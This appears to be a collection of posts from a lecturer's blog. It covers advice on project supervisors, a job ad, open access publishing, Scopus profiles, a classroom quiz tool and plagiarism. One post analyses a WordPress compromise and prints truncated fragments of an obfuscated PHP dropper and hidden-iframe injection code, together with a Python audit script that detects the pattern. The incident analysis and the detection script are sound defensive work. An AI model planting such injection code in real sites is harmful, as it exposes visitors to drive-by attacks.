Choosing a project supervisor

Dear students,

given that the deadline for choosing a supervisor is coming up soon, a friend of mine has suggested that I post a “serious” set of recommendations for now… So here are the suggestions I have (and that I keep repeating to my students):

First of all, try to think of the following:

  • What would you like to do? I don’t mean what would you like to do now, I really mean: what would you like to do when you finish your studies? Do you want to be a programmer? Do you want to be an analyst? What is your favourite activity? Think of your future, and use the final year project as a way to reach what you want to do / what you want to be.
  • You need to do a good job in your final year project: not only will it contribute substantially to your final mark, but you can also use your project in your job applications. It needs to identify a problem and you need to show your solution, and more importantly your path to reach that solution.

At this point, you can start looking for your supervisor. Look for someone with a research interest close to the topic you like, or someone teaching a similar subject. Have a look at the staff pages (start from http://www.cs.mdx.ac.uk). Don’t be shy: send emails and, more importantly, go to lecturers’ office hours! (check the right-hand side for my office hours).

  • Be prepared to change your topic. In a number of cases your project may be too ambitious for the short time you have, or maybe a solution exists already (in this case you could try to improve the solution).
  • Don’t try to copy someone else’s structure or topic: remember, you have to do what you like!
  • Have a look at the material that is available online (myunihub). In particular, have a look at how you will be assessed: it is important to develop a product or to obtain results, but it is equally important to do a literature review, requirements analysis, and design. An excellent piece of software without documentation is not enough; remember that you need to show your path.

Job ad: Linux + PHP + MySQL + Python

A company I know is looking for someone with some experience of Linux system administration, PHP + (My/Postgre)SQL and Python. The company is a start-up based in a great location (very close to Tower Bridge and the Design Museum). Salary is 40K. Contact me if you are interested and I’ll give you more details.

XSS exploit and WordPress

A couple of people sent me an email yesterday saying that one of the web sites I manage was a bit slow and in some cases it was crashing their browsers. As soon as I had a bit of time to check the website it was immediately clear that it wasn’t a configuration problem or CSS bug: the main page was trying to include strange links. I had a quick look at the source code of the page returned by the web server (using curl):

<script type="text/javascript">
// A lot of stuff here
  document.write("<iframe src='SOME LINK HERE' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");

I sat down with another sysadmin and we immediately found out that there was a problem with some of the php pages of this site and of other web sites on the same server. All the affected php pages had the first line containing the following php code:

<?php    eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX [...]'))); ?>

After decoding, this code does the following:

<?php 
   // [...]
   $dbf=$dr.'/'.md5(date('m.d.y'));
   $odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);
   if (file_exists($odbf))
     @unlink($odbf);
   if(strpos(@file_get_contents($dbf),$ip) === false){
      if( !preg_match('#bot|spider|crawl|slurp|yandex#i', $_SERVER['HTTP_USER_AGENT'])) {
        print "<script-->try{window.document.body= [...]; n=["9","9","45","42","17" [...] "
     }
   }
}
?>

The line

  print "<script-->try{window.document.body= [...]; n=["9","9","45","42","17" [...] ";

contains yet another encoded string (the variable n) that is passed to the browser, and then interpreted by the client to generate HTML code similar to the following:

  // A lot of stuff here
  document.write("<iframe src='SOME LINK HERE' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");

And this is a standard frame injection. We did a bit of analysis and we found that:

  • php.ini was configured to allow fopen of URL
  • Various folders were writable by the web server
  • All the infected files were owned / writable by the user running the web server

In essence: a cross-site scripting exploit that took advantage of writable folders in a shared environment. Thus, for your next installation of WordPress, have a look at Hardening WordPress, and in particular at the File Permissions section.
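An added example (not code from the original post): a small Python audit for the two conditions found above, PHP files whose first line carries the eval(gzinflate(base64_decode( wrapper and paths the web server user can write to. The names audit_webroot and web_uid and the constructed demo web root are assumptions made for this illustration.

```python
import os
import re
import stat
import tempfile

# Wrapper seen on the first line of every infected file in the post.
DROPPER = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)


def audit_webroot(root, web_uid):
    """Return (infected, writable): PHP files whose first line matches the
    wrapper, and paths that the web server user (web_uid) can modify."""
    infected, writable = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            # Writable by the web server: owned by it with the owner write
            # bit set, or world-writable (group bits are not checked here).
            owner_w = st.st_uid == web_uid and st.st_mode & stat.S_IWUSR
            if owner_w or st.st_mode & stat.S_IWOTH:
                writable.append(path)
            if stat.S_ISREG(st.st_mode) and name.lower().endswith(".php"):
                with open(path, "rb") as fh:
                    if DROPPER.search(fh.readline()):
                        infected.append(path)
    return sorted(infected), sorted(writable)


def demo():
    """Audit a constructed web root (sample data, not from the incident)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    clean = os.path.join(root, "index.php")
    bad = os.path.join(uploads, "page.php")
    with open(clean, "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    with open(bad, "w") as fh:
        # PLACEHOLDER stands in for the encoded blob; it is never decoded.
        fh.write("<?php    eval(gzinflate(base64_decode('PLACEHOLDER'))); ?>\n")
    os.chmod(uploads, 0o777)  # world-writable folder
    os.chmod(bad, 0o666)      # world-writable infected file
    os.chmod(clean, 0o444)    # read-only clean file
    return root, audit_webroot(root, web_uid=-1)  # -1 matches no owner
```

On a real server, pass the numeric uid of the account that runs the web server as web_uid; every path in the second list is one that a compromised PHP process could rewrite.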

Voluntary Open Access Journals

A recent article on The Guardian started (yet another) discussion on Open Access Journals. One party asks whether the results of publicly-funded research should only be available for a fee that helps the balance sheet of academic publishers. The other party wonders how we avoid predatory publishers of Open Access journals charging $500 or more to publish a paper, and playing the “impact factor game”.

I don’t have an answer, I only have another question… All the work I do for academic publishers is voluntary. I review various dozens of articles every year for free, because I can list this activity in my CV. The same happens for editorial boards: academics do it for free. My question is: can’t we do (as academics) the whole publishing process as voluntary? In addition to non-paid reviewers and non-paid associated editors, why don’t we have non-paid associated sysadmins to manage a server?

There are various business models available for open access journals. What would be wrong with the following idea?

  1. Authors are charged a small fee (say $20 for each accepted paper)
  2. Assuming 4 issues per year, 10 articles in each issue would generate approx $800/year. This should be more than enough to maintain a couple of virtual machines (mirrored, for backups). I think ISSN numbers are free, but this needs to be investigated.
  3. Open source software is available to manage submissions and reviews.
  4. Electronic copies are made available for free, hard copies can be printed on-demand: editors prepare a PDF version of each issue and upload it to lulu.com or a similar service, and libraries can print it from there if a hard copy is really needed.
  5. New journals are created by a “group of experts”, similarly to the creation of a new conference / workshop.

 

SCOPUS: check your profile

Yesterday we played “let’s see who has the bigger h-index” with a couple of colleagues. We decided to use Scopus (well, the free version of it) because it gives more conservative results with respect to Google Scholar. Also, Scopus may be used for assessing the quality of research, and I can easily imagine a reviewer looking for my profile if I submit a proposal or a paper.

I was a bit surprised to discover that I do not appear in Scopus:

There is a Raimondi Francesco Maria with publications in Medicine, Engineering, Computer Science, and additional areas that I cannot see because I do not have a Scopus account.

This is strange: I’m sure some of my publications should appear here (some of them are with Elsevier!), I have a Google Scholar Profile and it is more or less accurate.

I decided to contact the helpdesk using the “Live Chat” option. This was quite useful as I discovered a website to “fix” these issues: http://www.scopusfeedback.com/

The process is quite boring, but at least I could find my papers: they are listed under Raimondi Francesco Maria. I had to scroll the whole list of publications and manually select those that are mine. I did this yesterday afternoon; I am not listed as a separate author yet, but hopefully someone is on the case…

So, to sum up: check your profile on Scopus.

http://eqna.tk: a simple application to create multiple-choice tests

The idea is to exploit the fact that nearly all students now have a smartphone, and some of them keep using it even during lectures. This year I decided not to ask students to switch off their mobiles; instead, I’ll ask them to use it to interact with me.

The motivation is that sometimes it may be difficult to grasp the sentiment of a class, especially if there are more than 20 students. With this tool (developed by Lalith Kaushik and me) I can prepare questions in advance, or even during the lecture as the process only takes a few seconds.

Students can answer multiple-choice questions from their mobile phone using a short code (that can also be shared using Facebook and Twitter. BIS4610 students: please follow https://twitter.com/bis4610). The answer page is designed specifically to be accessed from a mobile device (and indeed it looks a bit strange on a standard PC).

The tool can be used to assess students’ comprehension of a topic (e.g. by asking “what is the square root of 16?”), but it can also be used to obtain feedback about delivery (“The pace of the lecture is: too slow / too fast / about right”), and suggestions for future sessions (“What would you like to do next week? Revision / Mock exam / Practical session”), etc.

On plagiarism etc.

Dear student,

in your final year you will need to work on a project that will require a substantial amount of your time. There is plenty of information available on this subject, please have a look at the material available on myunihub for your specific project module.

It is very likely that you will be able to choose the topic of your project in collaboration with your supervisor. Remember to choose something that you like, because you will need to spend a lot of time on it. If you like to write code, then you can develop a tool. If coding is not exactly your favourite activity, you can probably identify a problem and work on a systematic review of existing solutions for it, and propose new approaches for solving it. See our recent work on Systematic Literature Reviews to have an idea of this kind of activity.

There is also plenty of information available on how to cite material; don’t worry, you are welcome to report verbatim entire phrases from existing documents, provided you quote them in the appropriate way and you provide a reference for them. See the material available at this link for further guidance:

http://unihub.mdx.ac.uk/study/ldu/onlineresources/referencing-plagiarism/index.aspx

In all cases, remember that you cannot take “shortcuts”. I had too many cases of students postponing their project until the last minute, and then submitting work created by someone else. Remember that it is not enough to have a positive originality report from Turnitin… I have investigated this problem as part of my Postgraduate Certificate in Higher Education: please have a look at this report on the effectiveness of anti-plagiarism software if you are curious about the topic.

Hello world!

After 11 years (!!) I decided it was about time to refresh my web site…

I am in the process of copying all the material and links from the previous version to this new structure, please let me know if you notice something wrong.

I will try to keep things up-to-date and I have also enabled comments. If you are a student just have a look at the pages under Teaching (and let me know if you are not able to find something you need).

If you are looking for a paper, please have a look at my Publications page. If you are not able to retrieve a file just send me an email and I will post it to you.